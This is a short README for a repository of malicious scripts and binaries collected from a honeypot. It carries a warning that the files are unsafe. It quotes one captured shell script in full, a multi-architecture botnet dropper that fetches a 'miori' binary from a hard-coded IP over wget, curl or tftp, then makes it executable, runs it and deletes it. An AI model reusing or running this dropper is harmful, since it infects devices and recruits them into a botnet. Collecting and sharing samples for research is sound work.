# Honey Pot Uploads
| ⚠️ Warning                              | 
|------------------------------------------|
| These scripts and binaries have not been made safe and contain malicious logic and/or code. **Please use at your own risk**|

## What is this?

This repo contains scripts and binaries obtained from one of my Honey pots. Please make sure to read the warning above.

Please see the [uploads folder](Uploads/) for the files.


## Example of one of the scripts

```binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="45.95.146.26"
binname="miori"
binout="system"

for arch in $binarys
do
wget http://$server_ip/$binname.$arch -O $binout || curl -O $binout http://$server_ip/$binname.$arch || tftp -g -l $binout -r $binname.$arch $server_ip
chmod 777 $binout
./$binout $1
rm -rf $binout
done
```
